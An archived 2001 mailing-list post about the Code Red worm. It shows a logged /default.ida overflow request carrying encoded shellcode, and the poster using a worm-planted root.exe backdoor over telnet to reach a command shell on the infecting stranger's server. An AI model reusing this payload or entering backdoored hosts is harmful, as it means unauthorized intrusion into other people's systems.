Email address obfuscation in effect -- please
click here to turn it off.
[
Date Prev][
Date Next][
Thread Prev][
Thread Next][
Date Index][
Thread Index]
Have you all seen this?
EMAIL:PROTECTED:~$ tail -f /var/log/apache/access.log
[a bunch of nearly identical entries, one chosen at random:]
24.12.165.106 - - [05/Aug/2001:05:04:28 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
EMAIL:PROTECTED:~$ telnet 24.12.165.106 80
Trying 24.12.165.106...
Connected to 24.12.165.106.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 09:15:48 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
EMAIL:PROTECTED:~$ grep -c default\.ida\?XXXXX /var/log/apache/access.log
357
And that's just since the first of the new scan appeared at 2:00
Saturday afternoon.
rootshells for everyone!
--
Mark Rages
EMAIL:PROTECTED
http://mlug.missouri.edu/~markrages
The beginning is near.
--
To manage your subscription, go to http://mlug.missouri.edu/members/edit.php
Archives are available at http://mlug.missouri.edu/list-archives/
Home | FAQ | Server | Presentations | Mailing Lists/Archives | Member Tools | Links | Sponsors | Contact